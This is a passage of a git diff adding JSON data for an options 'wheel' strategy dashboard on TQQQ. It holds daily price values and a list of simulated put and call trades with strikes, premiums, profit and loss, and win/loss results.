"2024-12-26", + 526.2640380859375 + ], + [ + "2024-12-27", + 519.2684326171875 + ], + [ + "2024-12-30", + 512.3621215820312 + ], + [ + "2024-12-31", + 508.00982666015625 + ], + [ + "2025-01-02", + 507.0160827636719 + ], + [ + "2025-01-03", + 515.3134765625 + ], + [ + "2025-01-06", + 521.23583984375 + ], + [ + "2025-01-07", + 511.9348449707031 + ], + [ + "2025-01-08", + 512.0244140625 + ], + [ + "2025-01-10", + 503.9952087402344 + ], + [ + "2025-01-13", + 502.3755187988281 + ], + [ + "2025-01-14", + 501.8985290527344 + ], + [ + "2025-01-15", + 513.4453735351562 + ], + [ + "2025-01-16", + 509.8481750488281 + ], + [ + "2025-01-17", + 518.4535522460938 + ], + [ + "2025-01-21", + 521.4943237304688 + ], + [ + "2025-01-22", + 528.1620483398438 + ], + [ + "2025-01-23", + 529.284912109375 + ], + [ + "2025-01-24", + 526.2938842773438 + ], + [ + "2025-01-27", + 510.9710388183594 + ], + [ + "2025-01-28", + 518.5231323242188 + ], + [ + "2025-01-29", + 517.5492553710938 + ], + [ + "2025-01-30", + 519.7553100585938 + ], + [ + "2025-01-31", + 519.0001220703125 + ], + [ + "2025-02-03", + 514.846435546875 + ], + [ + "2025-02-04", + 521.1663818359375 + ], + [ + "2025-02-05", + 523.5313720703125 + ], + [ + "2025-02-06", + 526.2640380859375 + ], + [ + "2025-02-07", + 519.6261596679688 + ], + [ + "2025-02-10", + 525.916259765625 + ], + [ + "2025-02-11", + 524.6641845703125 + ], + [ + "2025-02-12", + 524.9722290039062 + ], + [ + "2025-02-13", + 532.5244140625 + ], + [ + "2025-02-14", + 534.7601928710938 + ], + [ + "2025-02-18", + 535.9724731445312 + ], + [ + "2025-02-19", + 536.12158203125 + ], + [ + "2025-02-20", + 533.8460083007812 + ], + [ + "2025-02-21", + 522.7662353515625 + ], + [ + "2025-02-24", + 516.5953979492188 + ], + [ + "2025-02-25", + 510.0866394042969 + ], + [ + "2025-02-26", + 511.3187561035156 + ], + [ + "2025-02-27", + 497.1188049316406 + ], + [ + "2025-02-28", + 504.9690856933594 + ], + [ + "2025-03-03", + 493.9190979003906 + ], + [ + "2025-03-04", + 492.42852783203125 + ], + [ + "2025-03-05", + 498.84783935546875 + ], + [ + "2025-03-06", + 485.12481689453125 + ], + [ + "2025-03-07", + 488.6922302246094 + ], + [ + "2025-03-10", + 469.7523498535156 + ], + [ + "2025-03-11", + 468.62939453125 + ], + [ + "2025-03-12", + 473.9159240722656 + ], + [ + "2025-03-13", + 465.38995361328125 + ], + [ + "2025-03-14", + 476.6386413574219 + ], + [ + "2025-03-17", + 479.72900390625 + ], + [ + "2025-03-18", + 471.5509033203125 + ], + [ + "2025-03-19", + 477.8608703613281 + ], + [ + "2025-03-20", + 476.24114990234375 + ], + [ + "2025-03-21", + 477.8111877441406 + ], + [ + "2025-03-24", + 488.29644775390625 + ], + [ + "2025-03-25", + 491.0829162597656 + ], + [ + "2025-03-26", + 482.04669189453125 + ], + [ + "2025-03-27", + 479.3000183105469 + ], + [ + "2025-03-28", + 466.6810607910156 + ], + [ + "2025-03-31", + 466.6611633300781 + ], + [ + "2025-04-01", + 470.4230041503906 + ], + [ + "2025-04-02", + 473.8563232421875 + ], + [ + "2025-04-03", + 448.4891357421875 + ], + [ + "2025-04-04", + 420.63397216796875 + ], + [ + "2025-04-07", + 421.6490478515625 + ], + [ + "2025-04-08", + 414.0557861328125 + ], + [ + "2025-04-09", + 463.7552185058594 + ], + [ + "2025-04-10", + 444.03070068359375 + ], + [ + "2025-04-11", + 452.2110900878906 + ], + [ + "2025-04-14", + 455.27630615234375 + ], + [ + "2025-04-15", + 455.7838134765625 + ], + [ + "2025-04-16", + 442.04034423828125 + ], + [ + "2025-04-17", + 441.9607238769531 + ], + [ + "2025-04-21", + 431.02362060546875 + ], + [ + "2025-04-22", + 442.3388671875 + ], + [ + "2025-04-23", + 452.3703308105469 + ], + [ + "2025-04-24", + 465.0987548828125 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.2393493652344 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.3596496582031 + ], + [ + "2025-05-02", + 486.4752502441406 + ], + [ + "2025-05-05", + 483.5892028808594 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378356933594 + ], + [ + "2025-05-09", + 485.6194152832031 + ], + [ + "2025-05-12", + 505.4036560058594 + ], + [ + "2025-05-13", + 513.1063842773438 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7637939453125 + ], + [ + "2025-05-21", + 510.5686340332031 + ], + [ + "2025-05-22", + 511.5240478515625 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.7091674804688 + ], + [ + "2025-05-28", + 516.4103393554688 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7599487304688 + ], + [ + "2025-06-04", + 526.222900390625 + ], + [ + "2025-06-05", + 522.261962890625 + ], + [ + "2025-06-06", + 527.3673095703125 + ], + [ + "2025-06-09", + 528.1434936523438 + ], + [ + "2025-06-10", + 531.63671875 + ], + [ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892333984375 + ], + [ + "2025-06-13", + 524.4215698242188 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417724609375 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.7831420898438 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.19921875 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.98779296875 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.192138671875 + ], + [ + "2025-07-10", + 553.3951416015625 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.15234375 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283935546875 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7241821289062 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747802734375 + ], + [ + "2025-07-28", + 566.0382080078125 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309326171875 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2213134765625 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7446899414062 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1739501953125 + ], + [ + "2025-08-20", + 563.8064575195312 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.5275268554688 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173828125 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1327514648438 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/trades.json new file mode 100644 index 0000000..b5951b4 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/trades.json @@ -0,0 +1,2066 @@ +[ + { + "date": "2021-05-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.96, + "spot": 25.28704261779785, + "premium": 0.38630960965539707, + "close_cost": 0.0, + "pnl": 32.65096096553971, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-05-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 23.77, + "spot": 22.923095703125, + "premium": 0.36890475172886283, + "close_cost": 0.8469042968749996, + "pnl": -50.789954514613676, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-12 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.38, + "spot": 21.07253074645996, + "premium": 0.6862935844823088, + "close_cost": 0.08787160874242739, + "pnl": 53.86219757398814, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-19 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 21.49, + "spot": 22.13749885559082, + "premium": 0.6319158341407203, + "close_cost": 0.6474988555908219, + "pnl": -4.54830214501016, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.81, + "spot": 24.183862686157227, + "premium": 0.323119969856025, + "close_cost": 0.0005916134258441147, + "pnl": 26.272835643018087, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2021-06-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.07, + "spot": 24.257888793945312, + "premium": 0.3580150158175366, + "close_cost": 0.03246982452185265, + "pnl": 26.57451912956839, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.2, + "spot": 25.048255920410156, + "premium": 0.3164468477646878, + "close_cost": 0.014929202741711056, + "pnl": 24.171764502297673, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2021-09-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.96, + "spot": 32.849281311035156, + "premium": 0.14406733641211034, + "close_cost": 0.015117293272267851, + "pnl": 6.915004313984248, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 31.06, + "spot": 28.424640655517578, + "premium": 0.12741057539834522, + "close_cost": 2.6353593444824206, + "pnl": -253.78487690840754, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 28.99, + "spot": 29.76420783996582, + "premium": 0.6224756894427834, + "close_cost": 0.7742078399658219, + "pnl": -18.163215052303848, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.98, + "spot": 31.815351486206055, + "premium": 0.3289938697457142, + "close_cost": 0.025865187052367067, + "pnl": 24.332868269334714, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-10-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.37, + "spot": 34.61149215698242, + "premium": 0.3708138307549236, + "close_cost": 0.0534263034481226, + "pnl": 25.758752730680097, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2021-10-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 35.34931945800781, + "premium": 0.38871819314490796, + "close_cost": 0.0724840174780299, + "pnl": 25.643417566687805, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-11-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.7, + "spot": 39.50651931762695, + "premium": 0.1604027890493782, + "close_cost": 0.00798337595052312, + "pnl": 9.26194130988551, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.38, + "spot": 40.791168212890625, + "premium": 0.13996627322859378, + "close_cost": 0.0, + "pnl": 8.016627322859378, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.34, + "spot": 36.674564361572266, + "premium": 0.3073998407694205, + "close_cost": 1.6654356384277378, + "pnl": -138.79357976583174, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 37.41, + "spot": 38.26963424682617, + "premium": 0.9146651401753001, + "close_cost": 0.8596342468261753, + "pnl": 2.5130893349124808, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-20 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 35.97, + "spot": 34.93144989013672, + "premium": 0.6238183346181181, + "close_cost": 1.0385501098632801, + "pnl": -44.463177524516205, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 35.63, + "spot": 41.402462005615234, + "premium": 1.3152941407541388, + "close_cost": 5.772462005615232, + "pnl": -448.7067864861093, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.92, + "spot": 40.86281204223633, + "premium": 0.9664350333923633, + "close_cost": 0.0, + "pnl": 90.66350333923633, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-01-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.41, + "spot": 34.527915954589844, + "premium": 0.745949098154643, + "close_cost": 3.882084045410153, + "pnl": -316.603494725551, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.22, + "spot": 31.84877586364746, + "premium": 1.181152331012676, + "close_cost": 0.0, + "pnl": 112.13523310126759, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-01-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 32.49, + "spot": 29.551692962646484, + "premium": 1.085704204413041, + "close_cost": 0.17374476803612726, + "pnl": 85.21594363769137, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 30.14, + "spot": 27.063579559326172, + "premium": 0.9261437958455385, + "close_cost": 0.1845470725047198, + "pnl": 68.17967233408187, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.6, + "spot": 25.43031120300293, + "premium": 0.8934350798416943, + "close_cost": 0.08866960082785669, + "pnl": 74.49654790138376, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-01 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 25.94, + "spot": 30.091337203979492, + "premium": 0.7967872682385568, + "close_cost": 4.151337203979491, + "pnl": -338.4449935740934, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.29, + "spot": 28.329132080078125, + "premium": 0.8336825194615454, + "close_cost": 0.0, + "pnl": 77.38825194615454, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.63, + "spot": 27.364444732666016, + "premium": 0.8933994773044294, + "close_cost": 0.0, + "pnl": 83.35994773044293, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 25.72, + "spot": 23.343351364135742, + "premium": 0.9722952342826545, + "close_cost": 2.3766486358642567, + "pnl": -143.42534015816022, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-01 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.81, + "spot": 23.897327423095703, + "premium": 1.2690614008727277, + "close_cost": 0.0873274230957044, + "pnl": 112.19339777770232, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 24.38, + "spot": 20.40155792236328, + "premium": 1.2428162334928636, + "close_cost": 0.00033222887240849305, + "pnl": 118.2684004620455, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-14 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.81, + "spot": 19.035720825195312, + "premium": 1.0565127407613186, + "close_cost": 0.0, + "pnl": 99.67127407613187, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 19.42, + "spot": 25.210628509521484, + "premium": 1.0004143475411862, + "close_cost": 5.790628509521483, + "pnl": -482.0114161980297, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.7, + "spot": 27.23072624206543, + "premium": 0.9956703193170249, + "close_cost": 0.1933553133404846, + "pnl": 74.25150059765402, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.72, + "spot": 29.39409637451172, + "premium": 1.036917875269907, + "close_cost": 0.0, + "pnl": 97.7117875269907, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-11 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.63, + "spot": 22.9995059967041, + "premium": 0.8649928172229657, + "close_cost": 4.630494003295897, + "pnl": -379.54011860729315, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.46, + "spot": 22.507619857788086, + "premium": 1.1031380283923173, + "close_cost": 0.0, + "pnl": 104.33380283923172, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-22 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 22.96, + "spot": 19.823699951171875, + "premium": 0.8969381189447514, + "close_cost": 0.025704347743483846, + "pnl": 81.14337712012676, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.22, + "spot": 18.247737884521484, + "premium": 0.8189177562613335, + "close_cost": 0.1042492521882914, + "pnl": 65.4868504073042, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.61, + "spot": 18.30982208251953, + "premium": 0.8275317935769717, + "close_cost": 0.0, + "pnl": 76.77317935769717, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.68, + "spot": 14.575267791748047, + "premium": 1.000470462218778, + "close_cost": 0.00010121608658721689, + "pnl": 94.05692461321907, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-05-16 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.87, + "spot": 14.637351989746094, + "premium": 0.9919107544118324, + "close_cost": 0.0, + "pnl": 93.21107544118324, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.93, + "spot": 13.056612968444824, + "premium": 1.0614774383271524, + "close_cost": 0.17573617000671726, + "pnl": 82.5941268320435, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.32, + "spot": 15.898120880126953, + "premium": 0.997267908552046, + "close_cost": 2.578120880126953, + "pnl": -161.0752971574907, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.94, + "spot": 16.667003631591797, + "premium": 0.8256473270129536, + "close_cost": 0.038432948318018356, + "pnl": 72.74143786949352, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 14.43, + "spot": 12.793954849243164, + "premium": 0.6981330950571119, + "close_cost": 1.6360451507568357, + "pnl": -96.78120556997237, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-13 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 13.05, + "spot": 11.022188186645508, + "premium": 0.812429373461077, + "close_cost": 0.09231494521170358, + "pnl": 66.03144282493734, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-06-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.24, + "spot": 11.643024444580078, + "premium": 0.717217664506208, + "close_cost": 0.4030244445800779, + "pnl": 28.429321992613012, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-06-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.94, + "spot": 13.36225414276123, + "premium": 0.5307510750010982, + "close_cost": 0.06535888281957303, + "pnl": 40.55921921815252, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-07-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.15, + "spot": 12.249529838562012, + "premium": 0.5217459099723278, + "close_cost": 0.0, + "pnl": 46.19459099723278, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-07-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.51, + "spot": 12.46921157836914, + "premium": 0.5024114751874693, + "close_cost": 0.043767388843162, + "pnl": 